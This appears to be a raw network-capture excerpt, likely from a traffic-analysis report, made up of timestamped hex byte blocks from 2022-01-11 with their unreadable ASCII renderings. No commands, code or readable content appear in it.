                                                                                                                                  2022-01-11 22:39:10 UTC3558INData Raw: e4 7c 53 64 87 f2 3f a7 23 de 5c eb 15 bd 9b 77 3f 60 0f 75 2d 0c a0 66 cf d2 e1 d0 e4 dc 23 ce 21 bc 55 92 d9 d1 a8 f5 72 2c 26 1a d9 b8 fe 19 66 c9 ee 14 c9 da 5c 43 2a f7 07 5c 13 ab f3 f2 65 19 c1 94 e1 15 02 64 8a 1a ce 9d 5e f5 b5 bf ab 3d 09 6c 56 12 e6 ef 9e 68 85 32 79 ba 1f 07 88 5a 01 33 f4 29 57 52 29 91 57 a6 8b f8 b6 52 a2 de f7 9f a3 9c 42 f2 7e 6d ae bb 52 47 60 c5 f1 c4 d4 a3 46 dc 19 c4 13 32 72 ff c2 8e ba 27 7f ed b8 5e 61 b2 c6 4c 6b 9b 52 b1 3b fc 6a 44 c2 11 15 5e de 0c a3 07 bd b8 a2 43 2d ef 42 02 b5 b8 8f 10 d6 50 98 bc e9 b3 36 7b cd dd 68 46 41 9d cb d3 c5 da 02 3f 54 28 4c 04 5d f8 f6 84 b1 73 3e bf fe 78 34 00 7d 59 6c f0 07 8a a0 67 b6 16 c3 29 15 5c 1d 6e 29 73 66 79 cc 92 38 ab 5e 4b 41 49 a3 80 5b 0f be b8 f6 e4 2b 84 5c
                                                                                                                                  Data Ascii: |Sd?#\w?`u-f#!Ur,&f\C*\ed^=lVh2yZ3)WR)WRB~mRG`F2r'^aLkR;jD^C-BP6{hFA?T(L]s>x4}Ylg)\n)sfy8^KAI[+\
                                                                                                                                  2022-01-11 22:39:10 UTC3574INData Raw: 7f a4 12 cc 5a 74 1f 51 68 d5 87 a6 88 23 e7 1c fe 83 1b 87 f2 9f dc 98 dd 2b 43 44 ec 32 60 7d 96 41 cb 29 67 9b 18 b2 53 84 b1 bf 58 c9 b5 a7 82 cf 64 ec 74 0e eb 75 85 97 dd d5 e3 f1 cb 7a 50 a9 f1 71 28 17 8f 4a 44 26 a3 d3 50 07 91 12 82 32 2a 54 6e 7e a9 1b 88 f0 88 da 17 85 8b cc e0 6d 2e 54 b0 ac dd cf 3e 60 47 a6 34 03 bc 18 83 69 d5 3a f8 89 11 e4 f8 8e fe c4 e4 a0 fb 50 95 81 51 3b e2 f7 f2 31 87 9a a3 5f 23 7a 2a 31 53 d2 af d6 6f 8f a1 f0 87 1d c3 56 e1 51 a1 36 73 8f f3 fb bd ff 2a 05 8f 92 bc d6 7c 9a ba ad f8 df 9c 1e 38 9f 07 50 40 19 7a d9 c6 8f 89 95 90 d8 20 30 60 8e c0 a8 b5 5e 32 fc 0c 5a de 44 02 7b 13 f0 58 47 e8 2b 94 18 8b b2 c1 3b ff 8a 91 23 80 b3 00 b5 bd 69 e2 74 75 05 0a a2 9f 14 2f 06 8d 13 51 58 85 19 86 9d 2d b1 49 e5 a3
                                                                                                                                  Data Ascii: ZtQh#+CD2`}A)gSXdtuzPq(JD&P2*Tn~m.T>`G4i:PQ;1_#z*1SoVQ6s*|8P@z 0`^2ZD{XG+;#itu/QX-I
                                                                                                                                  2022-01-11 22:39:10 UTC3590INData Raw: 94 0d 37 30 24 7d 59 9b c1 0c 4c b5 a7 27 61 90 01 41 80 49 5c fd 6a ad 92 de 4d ed 95 d9 51 1e 17 9a d5 c9 62 f5 de 9b 40 3f 11 45 78 07 9a 26 a5 01 e4 28 33 bf 21 25 ca 5f b0 18 ff 50 4f a8 f4 ca 82 de 01 05 8e 22 0d 3b 2e de f0 c9 12 5c 6d 4e 85 97 b1 45 ec fe cc 2f e6 2b 29 ee 46 6b 1b b3 53 da 20 41 11 10 e6 c9 2f 99 c8 60 f2 34 8f c9 ee 71 48 3f 3d f9 b0 6b 59 6e 86 24 78 4e 0a 68 6a 87 aa 3b 12 ac 85 15 5d 05 ed 1f e8 bc b9 f1 02 1f 29 68 95 0b ec dd d2 9c 41 d3 a8 d5 7b f4 ca 2d 10 f3 58 7a 00 e2 89 41 65 5e d6 31 58 55 ca 5b c3 21 66 13 84 21 9c 51 76 ed 1e f8 31 9a 57 87 c5 03 c5 6c f4 2d 39 1c 15 d4 db 71 f9 cc 3e c5 3c 46 f9 07 b5 24 2a 40 3a e3 9a 0e d3 3c 9a 55 8e b8 01 34 f5 f2 91 08 be cc e1 f2 e4 d9 49 e8 4c ef ac 2a c4 18 0b 8a 4a 80 3d
                                                                                                                                  Data Ascii: 70$}YL'aAI\jMQb@?Ex&(3!%_PO";.\mNE/+)FkS A/`4qH?=kYn$xNhj;])hA{-XzAe^1XU[!f!Qv1Wl-9q><F$*@:<U4IL*J=
                                                                                                                                  2022-01-11 22:39:10 UTC3606INData Raw: f0 35 fd 21 91 80 ba 30 7b 25 e3 87 b0 47 73 9a 23 03 b3 d4 61 15 f4 a1 4e c8 93 f5 4f 71 bd 29 4d ed 9d ab 18 32 f9 5a 36 3c d0 7b 52 a2 16 3b 70 16 de df 9b a1 84 e9 ed 3f ea 21 7b 40 8f a4 bd 10 fb ec 65 ac 04 b7 b8 09 00 89 f5 fb 57 bd 3d 47 a7 ff d1 7b 48 26 79 0f dc c0 a9 2e 4c 59 83 e1 27 dc 35 5d e4 8e cc e4 12 f2 64 a0 c6 cb 71 2e a2 a9 38 11 80 64 5f f7 29 01 f7 cb 7f c0 77 bc 79 b2 a4 84 3d 9a b1 6e c0 f7 16 1c 06 d1 0f 9b 02 7a 04 7b d8 82 90 25 cd b1 57 8d 6b 8c 61 bd e8 e0 3e ab 31 1f 70 80 eb 9b 45 b4 82 af ab 0f 99 72 0a 2a 0e 7b dc 11 94 fb 2b fc b8 90 6a c1 4c b8 71 bc 3e 9b ad 53 c3 e8 8d 84 f6 06 a5 0b bf e9 6c 21 48 98 4a ba ea 1f ff 44 59 13 cf 2c 21 99 a5 9f af ee 6e 64 f5 48 93 ad ba f9 b1 a0 40 63 92 ca e4 ba ac a7 56 f9 dc dc e5
                                                                                                                                  Data Ascii: 5!0{%Gs#aNOq)M2Z6<{R;p?!{@eW=G{H&y.LY'5]dq.8d_)wy=nz{%Wka>1pEr*{+jLq>Sl!HJDY,!ndH@cV
                                                                                                                                  2022-01-11 22:39:10 UTC3622INData Raw: 43 c2 f9 d6 56 8c 4a cb e8 ac 5a ab c1 e7 d2 43 cc 1a 9a 7a 82 b4 23 8a 83 4b 92 90 7f fa 35 78 22 42 f7 ff b6 9c 09 7f 5c a9 75 47 33 c0 47 f3 10 50 47 15 25 9d a8 e7 45 84 4d ca 4c 75 96 80 f5 39 1b 25 37 c9 7e 60 46 d0 eb 22 0f 0c be 73 ec 4b 3a cb e5 34 f2 40 ee 33 23 7f e4 57 c8 64 aa 59 b4 ea ae 9a dc f6 c4 17 a6 69 aa 23 2b 05 77 a5 c4 cc 78 bc e1 78 89 fd c7 00 28 15 aa 94 81 81 99 5d 9c f5 d3 15 c8 3b 68 23 d4 2b 3e 4a 52 ca 1a 1e af 4b 57 7a f2 e2 bb 4c 55 10 20 10 03 e3 f8 36 45 59 2a 1e 05 87 70 66 f1 2f 7d ff e9 4c 6f dc 74 d0 6e ed 35 c1 65 11 a8 75 42 4e 05 73 6a 35 58 d0 f4 0c c5 0d e4 cd 6a 66 c0 d7 10 fd f3 9d 8b d9 fd b4 1e 4b c8 aa 24 1f 37 7c c4 cc 22 b6 da 43 6f 5f ef 18 5c a9 89 03 87 42 56 e5 7a 81 c7 26 75 72 b6 2e 39 74 29 ae 4c
                                                                                                                                  Data Ascii: CVJZCz#K5x"B\uG3GPG%EMLu9%7~`F"sK:4@3#WdYi#+wxx(];h#+>JRKWzLU 6EY*pf/}Lotn5euBNsj5XjfK$7|"Co_\BVz&ur.9t)L
                                                                                                                                  2022-01-11 22:39:10 UTC3638INData Raw: 79 32 fa 74 4c 94 41 98 97 20 df 64 7d e3 b2 a5 2c 0e f1 7f f1 dc a2 1b 76 b6 32 06 1c c1 7d 85 a7 83 48 12 bb 31 d7 01 1e 0b 5e 9f 7e bb 44 5b 89 a0 4e 19 c9 8b e4 f4 60 d7 1a 49 41 0e 94 f5 cb 8a d7 4b 84 79 ae b2 b9 dc f7 c2 ec cf a1 d3 39 d3 82 79 b6 57 4d ac ef 9c 8c 36 ad 59 56 8b 24 e2 01 fe 54 75 1a 4c 90 b3 c2 31 52 c0 0e 05 fe 01 ed 82 32 8c d7 82 b0 cf 3a 8f 96 62 4e d5 2e c8 ce 46 f0 24 4a 01 5f b5 20 96 6f 34 25 e8 fc c2 da 7d 5f 93 0e 16 f8 99 1c 1d 69 ad 62 a2 9f f0 a8 54 7a a6 70 de 3c 28 41 d8 cf 25 13 49 35 83 7c 77 8e 2b 64 a4 d8 d1 5a 74 75 7f 04 5c 0d 1b 8d 71 41 29 ef b4 66 52 2b e1 dc 56 38 c2 e2 10 39 ad 7a d1 9d f4 4c 4d 26 45 be 3b 3e cd 1c 6c b4 5b 3f 7d 9b 9a ed bc 80 22 55 3a 96 75 4c 52 91 a9 88 8a 82 55 44 a8 f8 56 fb c3 08
                                                                                                                                  Data Ascii: y2tLA d},v2}H1^~D[N`IAKy9yWM6YV$TuL1R2:bN.F$J_ o4%}_ibTzp<(A%I5|w+dZtu\qA)fR+V89zLM&E;>l[?}"U:uLRUDV
                                                                                                                                  2022-01-11 22:39:10 UTC3654INData Raw: f0 ff c4 cc 16 68 5b 07 ec d2 b6 46 42 42 8f de 5f ed 8d 60 bc 99 74 35 64 06 53 41 c5 cb 86 e1 aa 53 39 a8 2d 77 c1 f0 98 a9 32 4a 47 f4 8e a8 d9 77 32 d4 d4 1f 0b 3d 51 3d 1e 89 ea a2 1f c7 84 ce 8d 7f d5 47 46 48 e2 b9 91 ea 14 78 d4 07 3c 6f d2 92 91 0e b9 4c bc 48 9e 53 62 8d 44 a8 96 51 db 9e ae 50 67 af 52 9a a5 e5 e0 d0 e4 32 37 b0 b1 75 6c 92 a5 01 57 8f d4 5d c7 1d 43 c1 a4 70 db ee 26 0e 2e 0f 19 6f df 8b 03 7d 95 aa c1 cf 6c 7f 20 5b b1 19 44 8e d5 cd 23 4c 68 bf 8b ec 44 82 3c 39 d7 f5 fe 96 0d 9b b1 d3 e6 2e 58 c3 d9 9a 26 27 33 50 54 eb 93 16 47 e1 0a f0 67 19 ed 9e 7b e5 5f 56 33 3f 59 63 10 a0 00 60 13 40 5e 4d 30 0c b3 1f 73 7c 15 2a b3 f9 5c f7 45 cd 51 fe c6 de 75 12 99 3b 1d e2 b6 04 f7 16 0d 2c 43 72 86 b1 5c 9d 72 f9 fa d3 02 4a 89
                                                                                                                                  Data Ascii: h[FBB_`t5dSAS9-w2JGw2=Q=GFHx<oLHSbDQPgR27ulW]Cp&.o}l [D#LhD<9.X&'3PTGg{_V3?Yc`@^M0s|*\EQu;,Cr\rJ
                                                                                                                                  2022-01-11 22:39:10 UTC3670INData Raw: d1 ee f8 27 88 d4 34 67 84 f5 42 35 02 00 89 34 8c ff 19 4a 69 d0 27 1a 77 e8 bf cc 36 43 fd 32 3d a8 9c aa 75 a7 b5 17 cb bd c3 0f 56 f6 dd 03 99 48 ac da 12 84 e8 bd 39 eb b4 df 87 c8 0b c5 d4 d9 43 a4 94 cb 28 d5 99 3d 5c 4e 80 7c 4e 4b 8f f2 d2 08 ac 49 92 31 44 18 f4 fe 57 4b 78 0d 43 27 69 36 f7 d0 b5 26 2c 62 b6 9c 95 f0 88 a5 75 8d 76 c6 bb 23 26 bf bc 80 ec 72 b7 f1 eb 5a a3 bc a2 46 74 30 a3 c9 69 23 b6 df bc 53 e4 91 b1 93 f5 3d bd f3 53 47 f4 0e 23 17 a8 ca fe c0 58 cd 0a a2 71 3f b3 a6 f1 c7 44 2c bd 08 17 44 67 95 a1 20 68 22 b4 c4 66 e2 2a a1 bc 6b b5 ae bc ed f7 d9 e1 31 4c 23 43 1e a2 b1 51 e3 8b e9 81 d1 1a 08 36 64 8b 10 8b 0d 8b 51 8a 16 64 62 f0 6c 2e 9e 80 1f 28 ac b0 cf ec 59 64 6e a5 63 9e a5 f5 10 f8 b2 5d 5b 1c dd 19 3b 71 fd 57
                                                                                                                                  Data Ascii: '4gB54Ji'w6C2=uVH9C(=\N|NKI1DWKxC'i6&,buv#&rZFt0i#S=SG#Xq?D,Dg h"f*k1L#CQ6dQdbl.(Ydnc][;qW
                                                                                                                                  2022-01-11 22:39:10 UTC3686INData Raw: 1f e1 76 73 b4 6a b6 6a b7 c6 ec a7 c7 a7 05 08 b0 b6 83 ee 97 7e 18 ef 1d ed 77 ee 67 81 25 fd 4a 3c 85 dc 86 03 2f d5 f2 62 aa 8a ab bc 52 38 8b 50 1d 23 9b af 47 15 89 c5 39 cf 83 d8 12 04 7f 00 7b 56 e5 97 98 5d c3 6c 81 2e 34 2b 24 c6 5f 72 4f 78 90 6d 5c ef e2 04 65 14 7e 66 dc 2f 46 19 a1 00 1e 6c 30 e5 f5 86 2e 97 50 fa ab c1 76 0b b3 f7 80 c3 f0 c6 2d 70 ed f0 57 8e 1d a1 aa 04 98 5d 95 d6 e8 d1 f5 b2 b4 3b 92 43 16 cd b8 b2 55 bd fb 2e 4a 16 dc 3a b8 87 7d c9 f2 79 62 15 e4 0a 33 86 cc 4e 44 c1 7b fc 39 86 d3 66 93 f9 7f f4 1e 39 e7 a8 36 74 b1 e9 34 82 dc c1 e2 64 7f 11 7b 61 80 d6 a1 3b 46 45 64 bb 98 8d 2a eb cc 22 92 cc 89 b2 50 64 d7 55 c1 da 5c 1b ce a7 0a 57 f1 2a b8 f7 7a 9b c7 9c 8c 1d c3 c9 d4 45 59 8b 28 e5 1f d8 d9 9d 3c 07 45 55 8b
                                                                                                                                  Data Ascii: vsjj~wg%J</bR8P#G9{V]l.4+$_rOxm\e~f/Fl0.Pv-pW];CU.J:}yb3ND{9f96t4d{a;FEd*"PdU\W*zEY(<EU
                                                                                                                                  2022-01-11 22:39:10 UTC3702INData Raw: 28 f1 b1 56 4a b2 92 47 aa 2e 67 aa c4 f3 42 90 fd 0b 24 7b 23 04 ef 8c 10 c3 25 9b ba fa 39 33 22 a3 3a ba 13 b7 53 7e cb e4 57 6c 10 4d de e8 e5 89 9e 4c c8 ed 1d 1a bc 58 bf 64 08 5e 36 2d 3a 03 07 48 86 05 01 e4 49 50 a5 6e d1 55 3b ed 25 e9 f6 33 bf 8f 26 2d 26 f8 be f8 c3 7e 63 4f ae 73 e9 f9 8f d7 43 e0 c6 cb 3a 83 2e 8b 51 bc de d6 af ec c8 46 19 11 fc 31 d8 6f c3 7b 0d 0c f8 c3 87 d9 e0 ee 59 6d f2 35 f4 dc 0a d6 93 c3 44 8f e0 e1 d5 46 b2 54 c2 19 8d 0c 96 16 f0 bb ff 0d 18 d3 d6 57 1f 52 b4 3a 23 e6 b4 13 57 4e 42 3d 49 29 b4 3a 1b 1e 09 fd 3e 2d dd 6d 29 f1 6d 22 e0 cf 19 01 3c 52 2f 85 74 87 b8 02 af 3e 74 d0 98 c0 1a 90 5e 25 08 ec ff 12 fc 5a 82 75 89 d9 5b 3f 8a 8d 2d 3b d9 cf c7 ab 6e a1 fd a7 ab 4a e1 77 ec a0 0a 2e 00 ad cb 0b da fe 1f
                                                                                                                                  Data Ascii: (VJG.gB${#%93":S~WlMLXd^6-:HIPnU;%3&-&~cOsC:.QF1o{Ym5DFTWR:#WNB=I):>-m)m"<R/t>t^%Zu[?-;nJw.
                                                                                                                                  2022-01-11 22:39:10 UTC3718INData Raw: 3d 67 f1 7e dc cf a0 12 a1 b6 af 17 92 0f 5e 21 9c dc 78 57 22 fe 76 dc 3a 5c 4d a8 13 1f 10 d0 1c 01 f2 15 b5 76 95 34 fb 41 fd 24 64 d6 01 ab 5a 60 b7 36 ed d5 eb 69 38 08 45 f4 13 a2 19 fe d4 8f 7f aa 11 8b d9 4f 6c 68 88 8c c2 f7 42 82 5c 46 4b 1a be 9a b6 28 4c 7d 74 7a cb 41 97 69 20 02 64 d5 a7 ac 3c e7 23 45 14 73 b0 86 e1 82 07 ab e3 89 43 40 dd 0e e7 c3 b5 95 09 fa 8a c6 b5 ad df d7 3e 9c 1c 95 ad e2 61 b8 07 76 54 e5 cc 0b e7 1c 54 1a ed c1 55 8c 0d b9 22 c5 c0 50 a9 7d bf 8c 1b 32 ad 33 a0 fb c5 a3 d9 09 ed f4 33 0a 70 15 81 72 01 00 06 29 3e 35 0c a5 b1 76 25 6d e2 16 cf 13 55 98 03 fe dc b7 90 b5 82 bd 0a be 6b e3 d7 91 c5 5d 7d 1e 83 fb 7e 58 1a 91 90 c2 80 70 97 67 2e ad ff cb 5e 7b eb 6d c1 89 dd 09 ac 66 69 70 68 00 31 02 85 fc 43 62 c5
                                                                                                                                  Data Ascii: =g~^!xW"v:\Mv4A$dZ`6i8EOlhB\FK(L}tzAi d<#EsC@>avTTU"P}233pr)>5v%mUk]}~Xpg.^{mfiph1Cb
                                                                                                                                  2022-01-11 22:39:10 UTC3734INData Raw: 73 45 59 80 e6 22 3c c9 64 c2 45 41 77 00 7f 4b 30 58 f6 16 06 62 15 fd 03 35 d9 68 d0 84 ac 8e a4 a3 56 d6 59 81 db 03 be e8 c4 48 65 5a 51 0c 9f 4e 40 eb 88 b4 7c 07 78 37 c7 0c c0 eb 4d 92 59 16 ae 6b 11 44 f3 16 31 55 08 4a fa a0 d0 04 bd 35 0f f1 4e 0b 3e 7f 30 38 43 67 07 0d fa 85 85 60 d0 a8 16 59 f1 6a b0 58 45 45 25 bf f6 b9 c3 1f 68 69 a8 25 78 be 6d 9e 8c 27 46 7e d3 98 53 8c 94 c1 68 f5 4c 58 f0 1f ab ca e8 3f 92 5e c6 d7 a5 90 59 c0 87 40 10 ee 95 69 a8 c4 38 03 d0 9e 22 83 f0 8b 03 72 dd e1 81 b7 2c 3b 2b 28 bd c3 3d 4a 47 0c 3b 28 76 f1 5e 98 5d 51 75 4e d8 09 f7 d9 71 f0 44 66 aa a9 c3 4e b6 7b 8f 8f 7b b1 50 a0 81 d4 4f b4 f8 57 9c e1 04 78 82 0c 67 fa 1a dd 83 21 2f 9d 1b 30 5a ae ae 58 bb 59 a4 b1 52 4f 53 e5 6c f3 93 ec 24 d0 63 40 04
                                                                                                                                  Data Ascii: sEY"<dEAwK0Xb5hVYHeZQN@|x7MYkD1UJ5N>08Cg`YjXEE%hi%xm'F~ShLX?^Y@i8"r,;+(=JG;(v^]QuNqDfN{{POWxg!/0ZXYROSl$c@
                                                                                                                                  2022-01-11 22:39:10 UTC3750INData Raw: 0f 2f f6 37 7e 5e 88 11 f7 c2 37 c8 d6 93 d4 6e f9 ab c2 8f d4 9b 88 fc 44 43 d0 e7 51 d0 d9 99 1e fc 8d ec b9 d8 71 da f5 57 28 1a 3f bd 87 85 18 39 27 3d ea ba e3 fe ad 5e 4b 42 96 41 00 31 b1 06 3e 7a a6 dd 83 a3 2b 15 15 20 f6 5e 0e fc bf b9 21 2c 10 88 4e 02 52 5a 64 19 e2 5b 51 cf 39 a9 f5 4d e7 ff b3 37 8c 6f d0 9f 22 44 d3 67 08 2c 6c e0 0f 45 14 57 c6 95 20 02 8d cf 6d c6 d5 c4 23 84 d7 87 04 6e 48 63 95 bd 77 80 51 9c 72 aa c1 c4 fc 10 7d 80 23 e3 ae 82 f6 d2 d0 dd 49 12 7c 34 44 2c ba 28 e6 c8 e4 34 a1 d5 c5 4c fb 2e 8d 82 da 95 76 08 55 e1 b0 a0 d7 6e 26 13 98 0d db 3b 46 c7 19 41 e1 6d cb de b3 cd 34 28 ea d7 82 88 f5 27 48 30 bd 8f 53 64 b3 e7 1a c1 88 49 26 67 f5 e6 a9 8f 22 b3 ba b9 45 d7 0c 7e 5d b2 63 e8 8e ee 19 26 c0 57 4b da 0d 5d 61
                                                                                                                                  Data Ascii: /7~^7nDCQqW(?9'=^KBA1>z+ ^!,NRZd[Q9M7o"Dg,lEW m#nHcwQr}#I|4D,(4L.vUn&;FAm4('H0SdI&g"E~]c&WK]a
                                                                                                                                  2022-01-11 22:39:10 UTC3766INData Raw: aa d2 9f a3 5e 85 1b fd 7a 89 52 20 25 87 3b 1b f1 05 78 0b ef 85 7a 07 8f ef 02 c7 42 cc da 7c fd 4b 70 4c 2d 8f 35 71 41 30 cd a5 4e 43 d1 99 c4 b2 3a 88 35 d3 2a 81 27 a5 2e 8a 92 ec 24 5a 88 10 8c dc 37 18 72 40 0f 15 99 4c 5c 54 e2 b7 db 4a e8 af d0 a4 22 b8 32 5e d4 4e 25 7d 07 bc d6 e8 0f 49 76 31 9b 02 15 47 aa d1 c5 06 23 b0 d4 5f f7 ec 2c 68 6e 24 e4 29 fd 1c 01 3b ea 86 80 8b fd f3 55 3b bf 54 85 c5 f6 99 66 07 0c 2f cf a7 21 92 b3 45 c1 f8 fa e3 27 dd 3a 89 36 32 53 a4 b6 ae 15 fe d1 40 b1 20 bf d9 19 c6 f5 16 00 59 57 d0 b7 a8 2f d3 75 7c 3a 65 33 03 72 96 ec 46 85 ae 05 a7 a8 c7 ea f9 85 b1 f8 7d e2 5e 0e 65 33 f1 78 ef 96 f1 88 5f 7d fa d5 54 14 84 16 91 24 f7 17 12 21 58 b0 b2 3b e8 40 2f 32 52 46 b6 7d 75 34 f6 50 bf 44 71 30 36 3f 3f df
                                                                                                                                  Data Ascii: ^zR %;xzB|KpL-5qA0NC:5*'.$Z7r@L\TJ"2^N%}Iv1G#_,hn$);U;Tf/!E':62S@ YW/u|:e3rF}^e3x_}T$!X;@/2RF}u4PDq06??
                                                                                                                                  2022-01-11 22:39:10 UTC3782INData Raw: d5 59 f6 ea 01 89 af 34 89 fd 72 d9 a5 67 44 11 1f 0e 09 e7 06 5b d7 d6 ee 3e e0 7f 4d f0 56 98 e6 a0 76 b4 fc 9b 2e 53 3c 12 ca d6 69 01 76 8b 9b 92 fa 5d cd 1a 2d dd b9 64 e3 13 70 ed d5 45 85 bb 88 50 ae 3c 0a 64 20 2a 13 a9 ea 99 dd 70 e5 fd 9e 74 7e 15 4a 15 40 07 4a 9e 17 cd 56 3c 3e 19 58 fd 30 b6 ff 9c c3 cb 92 0b 30 63 7a b6 ec 9d 45 b8 f0 66 10 6a 28 20 ee 56 fa 6a cd 86 6d 41 22 86 55 37 76 c7 f4 8d 6c 5b 68 6c d5 3a b9 d8 4b 0e a9 6c 60 33 10 7e 27 c5 fe e4 2c 0e fe a8 de 65 32 7a 52 57 e2 c6 b0 89 36 5b 92 7e ed 89 ec 6b f5 39 64 78 67 0a 09 2c bb 5d a5 f5 fa d3 c8 b0 62 0a 96 ed 75 a0 f0 c1 50 20 cb d9 17 83 e8 00 c9 ee 35 ab 96 5e a1 90 98 5a 97 58 b0 8e f0 92 cd 2b 88 f2 9e d6 41 4c a5 ad fc 38 c9 6c 94 ad ff 68 5a 55 78 3b 1a bd 59 64 ca
                                                                                                                                  Data Ascii: Y4rgD[>MVv.S<iv]-dpEP<d *pt~J@JV<>X00czEfj( VjmA"U7vl[hl:Kl`3~',e2zRW6[~k9dxg,]buP 5^ZX+AL8lhZUx;Yd
                                                                                                                                  2022-01-11 22:39:10 UTC3798INData Raw: e5 b8 94 b3 bc 0a af 44 88 fc 39 89 fb d3 77 b4 9b 5e b9 80 4c fc 53 91 60 24 28 2d 19 f9 7e ca 3d 88 59 5c d7 ae 83 d4 92 5e ac 09 99 8d d4 dd 29 33 04 48 96 48 9a c9 f8 00 74 2a c7 33 c5 e5 0b 79 96 5b 3f 51 c0 c1 40 19 74 19 d6 44 97 2d b3 fe 12 ec 78 f4 18 b9 de 5c 9e 22 0a c7 63 e0 dd a0 44 37 5b f5 5e f6 f2 b8 8a a2 1c ab b1 d0 8e b6 65 86 c1 8e 84 03 6a d7 38 04 d5 b5 5d aa 68 d8 68 2b 83 b5 fe 3e 63 27 84 2a c1 d8 5c f7 76 25 4a 71 11 9b 81 8c 2e ca df 54 55 b8 af 09 c0 61 07 d9 17 ce e4 09 e3 10 be 77 d0 ec 5f e6 a7 55 49 4b 2e 4d 00 fa 2b 58 d2 e2 de 53 a5 48 bd 23 0a db 12 06 4d 6f 01 5d d2 5c 50 30 04 4b 8c 01 25 07 c3 71 37 a0 e8 24 29 f1 e8 2c 79 d4 ca b5 f2 8f 9b 7c 11 b5 c7 57 b1 ff 64 2f 39 a7 e9 76 ab 6b 5c ea 3d 79 c0 d9 f5 3f 04 4f 89
                                                                                                                                  Data Ascii: D9w^LS`$(-~=Y\^)3HHt*3y[?Q@tD-x\"cD7[^ej8]hh+>c'*\v%Jq.TUaw_UIK.M+XSH#Mo]\P0K%q7$),y|Wd/9vk\=y?O
                                                                                                                                  2022-01-11 22:39:10 UTC3814INData Raw: 2b ba 4d 5d bd a2 0d c9 22 97 cb 40 44 31 44 3c 99 81 62 39 41 20 62 21 e6 29 04 9e a3 4e 0c a1 54 b6 f4 55 a8 0a 22 62 ea 85 e9 b5 4f 19 18 52 53 78 3e 8d bb f9 b8 1a 98 71 12 e0 90 ac 7b 6b 40 82 6a 1f bd 21 c0 e1 ef 23 fe ce f3 68 3d 82 50 56 76 d2 34 6b ef b7 14 dd f5 04 93 5f ad 5e df 23 0b 1e 90 2b 26 be 4d 9b 1f 73 8f b1 9f e8 ce 87 0b 2f 76 21 fe 97 9e 84 0e 3b 0c 5e f3 2b 74 e7 73 6a af d4 03 23 3d 53 e4 16 73 7c 7a a3 20 cf 46 5d 20 77 12 9d 82 a9 98 28 0b 39 df 24 93 cb 8f ff 8b 81 69 ff a6 97 37 61 60 e9 0d 81 fb e4 6d 46 1c 79 02 92 76 47 34 c3 3f 89 46 c6 fd c3 5a 2e a0 06 96 22 ac 81 9c 0b b1 b4 17 bd cd 73 18 20 81 93 8c a6 ad 7f 6c 6f 5a 80 c5 9f b4 b2 b8 34 eb 4d d2 83 2e bd 6f 16 da fc 2a a6 9e cc 94 ba d8 d6 fb ba b7 be f5 01 9c b4 44
                                                                                                                                  Data Ascii: +M]"@D1D<b9A b!)NTU"bORSx>q{k@j!#h=PVv4k_^#+&Ms/v!;^+tsj#=Ss|z F] w(9$i7a`mFyvG4?FZ."s loZ4M.o*D
                                                                                                                                  2022-01-11 22:39:10 UTC3830INData Raw: 78 db 22 51 ed 5e 23 54 b0 fe 71 62 64 4a bf f3 2b 62 98 ef 7f 89 70 9a 32 05 3f 72 7c bb d5 1f a1 29 94 91 df 88 fa 2b 8f a3 51 dd f4 40 d5 c8 89 e5 ba cd 56 da 93 30 e3 3e d5 25 c0 52 fa f3 21 e8 80 1e 95 eb 74 42 97 d7 9e fd 24 e3 9b e8 43 b8 1d 78 bb b6 d6 98 81 37 7c cc 8e 96 de 5c ef d7 8b 60 b8 6f 3b 52 3d bf 70 6a d3 ed b8 ec fd a8 a7 bc 3d c2 69 7c 74 c5 32 85 8d 23 1e f4 39 01 6f 73 7a 35 23 0d 7c 7c 80 25 da 4b 47 9d 47 7a 7a 7d c0 ab 3e 8b fa 9f 40 3f 84 b9 76 9c 6a e6 71 2d 6e b8 a6 47 92 0b 7e ee e4 f1 2a 1f e6 f4 34 3b 7d 38 a0 f2 73 48 2c 45 cc ba 19 8d e8 b9 82 73 bb 04 c4 40 c6 b0 39 8a 58 84 9c 12 c0 9d 1f b6 73 13 e8 07 7e ff 67 58 e4 c1 53 ae 45 fe eb cb 84 e4 7c 03 c7 e8 66 a4 ce da bf 11 fb a3 ff 58 e4 e3 88 ef f6 c9 c2 05 35 57 6c
                                                                                                                                  Data Ascii: x"Q^#TqbdJ+bp2?r|)+Q@V0>%R!tB$Cx7|\`o;R=pj=i|t2#9osz5#||%KGGzz}>@?vjq-nG~*4;}8sH,Es@9Xs~gXSE|fX5Wl
                                                                                                                                  2022-01-11 22:39:10 UTC3846INData Raw: da c7 92 29 e4 ac 2a 98 cf 7b 3e 45 94 07 59 5b 24 5f 40 e3 44 b3 6c 2c d7 9c ec 8f d4 7d 28 34 67 68 78 a0 18 99 39 26 ee 9b e6 a9 0b 3f 0e 52 88 22 2d fe 6c cd a1 77 ee 14 77 62 ce a8 fe 0d 55 4c e8 8a 22 83 1d 58 a0 f4 67 c4 3c 4e cf 17 38 97 33 fe 79 85 5b 09 f9 4c 2d 6c 8a 41 2c 56 69 50 d1 a2 56 2b 77 7f 3e dc 41 67 fb 50 e6 5e f1 2a 5a 84 e5 b4 2b 65 fb 6c f3 cf 6b 4d 6d 99 48 a4 0e 74 ac ff a8 ff 86 62 4a 42 8d 01 5d f7 05 1e a8 91 95 ed cc 91 91 7c 3f b0 c8 9f be 88 02 86 2b da 2b 90 d3 f1 50 84 e1 f2 2e c1 c5 f6 5d bd 6d 96 f4 82 e4 52 87 86 53 4c 5e 9f 91 7e fb e3 4b 1a 38 cf 61 d2 c2 39 5c ff a0 a2 2d d5 e0 f5 71 47 f0 3b de 5e 3d d9 0c f8 e2 a1 2c fb a9 f5 25 44 29 0f a4 7f ba 87 2b 7f 53 25 18 b0 93 1d ff 24 f0 73 0b 14 a4 f7 b0 9a 05 ce 3d
                                                                                                                                  Data Ascii: )*{>EY[$_@Dl,}(4ghx9&?R"-lwwbUL"Xg<N83y[L-lA,ViPV+w>AgP^*Z+elkMmHtbJB]|?++P.]mRSL^~K8a9\-qG;^=,%D)+S%$s=
